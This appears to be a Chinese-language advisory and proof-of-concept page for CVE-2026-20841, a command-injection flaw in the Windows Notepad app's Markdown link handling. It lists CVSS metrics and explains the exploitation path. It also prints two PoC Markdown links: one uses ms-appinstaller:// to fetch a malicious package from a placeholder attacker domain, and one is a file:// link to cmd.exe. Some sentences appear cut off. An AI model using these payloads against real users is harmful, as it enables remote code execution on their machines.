| 字段 | 详情 |
|---|
| CVE ID | CVE-2026-20841 |
| 标题 | Windows 记事本应用远程代码执行漏洞 |
| 影响 | 远程代码执行 |
| 最高严重性 | 重要 |
| CVSS v3.1 基础 / 时间评分 | 8.8 / 7.7 |
| CVSS 向量 | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77:命令中特殊元素的不当中和('命令注入') |
| 受影响产品 | Windows 记事本应用(Microsoft Store 版本,11.2510 之前的版本) |
| 分配 CNA | Microsoft |
| 发布时间 | 2026 年 2 月 10 日 |
| 公开披露 | 否 |
| 已被利用 | 否 |
| 可利用性评估 | 被利用的可能性较低 |
Windows 记事本应用对命令中特殊元素的不当中和('命令注入')允许未经授权的攻击者通过网络执行代码。
现代 Windows 记事本应用(通过 Microsoft Store 分发)引入了 Markdown 渲染支持,其中包括可点击的超链接。该漏洞的存在是因为记事本在处理 Markdown 链接中的 URI 方案之前,未能正确验证和清理这些方案。攻击者可以构造一个包含特殊格式链接的恶意 .md 文件,当用户点击这些链接时,会触发未经验证的协议处理程序来加载并执行远程内容。
| 指标 | 值 |
|---|---|
| 攻击向量 | 网络 |
| 攻击复杂度 | 低 |
| 所需权限 | 无 |
| 用户交互 | 必需 |
| 影响范围 | 不变 |
| 机密性影响 | 高 |
| 完整性影响 | 高 |
| 可用性影响 | 高 |
| 指标 | 值 |
|---|---|
| 利用代码成熟度 | 未证实 |
| 修复级别 | 官方修复 |
| 报告置信度 | 已确认 |
攻击者如何利用此漏洞?
攻击者可以诱骗用户点击在记事本中打开的 Markdown 文件中的恶意链接,导致应用程序启动未经验证的协议,从而加载并执行远程文件。
远程代码执行的目标上下文是什么?
根据 CVSS 指标,攻击向量为网络(AV:N),且需要用户交互(UI:R)。恶意代码将在打开 Markdown 文件的用户的安全上下文中执行,使攻击者获得与该用户相同的权限。
.md)文件。ms-appinstaller://),从而获取并执行远程载荷,或触发可直接启动本地可执行文件的 file:// URI。免责声明: 此概念验证仅严格用于教育和授权的安全研究目的。请勿将其用于您不拥有或未经明确书面许可进行测试的系统。未经授权访问计算机系统是违法的,并将受到法律制裁。
该 PoC 通过构造的 Markdown 链接演示了两种攻击向量:
向量 1 - 通过滥用协议处理程序进行远程载荷安装:
[点击查看文档](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
向量 2 - 通过文件 URI 调用本地可执行文件:
[点击此处](file://C:/windows/system32/cmd.exe)

.md 文件。本仓库中提供的信息仅用于教育和授权的安全研究目的。此概念验证旨在帮助防御者理解和缓解该漏洞。作者对此处提供的信息或工具的任何滥用不承担任何责任。在对任何系统进行漏洞测试之前,务必获得适当的书面授权。在大多数司法管辖区,未经授权访问计算机系统属于刑事犯罪。请负责任且合乎道德地使用。